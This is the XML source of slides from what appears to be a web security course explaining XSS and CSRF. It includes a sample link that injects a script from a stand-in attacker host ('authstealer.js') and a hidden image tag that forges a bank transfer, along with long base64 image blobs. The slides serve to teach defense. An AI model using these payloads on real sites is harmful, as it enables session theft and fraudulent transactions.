                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Karl posts a link in a different cat forum, telling everyone to check out some additional cat videos.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Hey!   Check out the videos at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://ubercatvids.com/search.cgi?searchword=fluffy&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=http://myevilsite.com/authstealer.js/&gt;&amp;lang=en</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bruce clicks the link, but no cat videos!!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What just happened?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34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5839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304185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duchess.grasslands.ab.ca/images/content/Untitled-Minions-Project-Min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104" y="1085849"/>
            <a:ext cx="2734596" cy="3390901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hidden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123950"/>
            <a:ext cx="2514600" cy="33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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>[7]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>If you call in the next 360 minutes, you will get:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Thorough understanding of web-centric attack vectors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Primer on modern web user agents.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hands-on experience with web research tools and attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Expertise in server-side* and client-side threat defense.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Introduction to advanced content-agnostic research techniques.</a:t>
            </a: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</a:rPr>
              <a:t>But wait, there’s more!!!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*As applies to end-user security.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1717731999"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="med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(XSRF)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200" dirty="0"/>
              <a:t>The evil brother to XSS, also bypassing SOP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Opposite of XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Exploit the server’s trust in the browser, not browser’s trust in the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Execute malicious actions against a user (as that user!) on their trusted server (i.e. online bank account)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Target sites which rely on identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Banking/Finance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Forums/Social Media</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Exploit the site’s trust in that identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Victim’s requests are pre-authenticated by cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Trick the user's browser into sending requests to the target site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Invoke side-effects on the target site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Transfer funds, change password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="12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109374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(XSRF) -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575" y="971549"/>
            <a:ext cx="8429625" cy="393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Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A regular funds transfer from me to Fred.  (Authenticated POST)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 https://mybank.com/transferfunds.cgi HTTP/1.1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Content-Length: 19;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acct=FRED&amp;amount=100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book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Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malicious Actor also notices the SAME funds transfer operation works this way. (Authenticated GET)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https://mybank.com/transferfunds.cgi?acct=FRED&amp;amount=100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book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Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malicious Actor crafts new URL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https://mybank.com/transferfunds.cgi?acct=JAN&amp;amount=100000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr 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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malicious Actor creates the following HTML content, and embeds it in a forum I use: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&lt;img src="https://mybank.com/transferfunds.cgi?acct=JAN&amp;amount=100000" width="1" height="1" border="0"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>I visit the forum and I get a broken image icon while browsing posts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/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  <a:latin typeface="Franklin Gothic Book" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What just happened?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5E6A7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04325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 – ATTACK THE WEB GOAT!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8100"/>
            <a:ext cx="2114550" cy="21568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0" y="927099"/>
            <a:ext cx="2971800" cy="3874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612971"/>
      </p:ext>
    </p:extLst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657600" y="1276350"/>
            <a:ext cx="5298713" cy="26670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pic>
        <p:nvPicPr>
          <p:cNvPr id="2056" name="Picture 8" descr="http://www.terminally-incoherent.com/blog/wp-content/uploads/2012/08/hole-haw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9962" y="1845036"/>
            <a:ext cx="1888764" cy="186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HTML5 THREATS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3077987" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Browsers themselves have become and will continue to become more secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>But…….Attack surface is much greater with HTML5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Malware authors will exploit rich HTML5 feature set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Insecure content and CORS policies will hurt the end user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>This will not end well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Web Developer != Security Expert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>HOT JOB: HTML5 Web Application Security Expert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mtClean="0"/>
              <a:t>Saturday, February 23, 2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 2" descr="data:image/jpeg;base64,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4" descr="data:image/jpeg;base64,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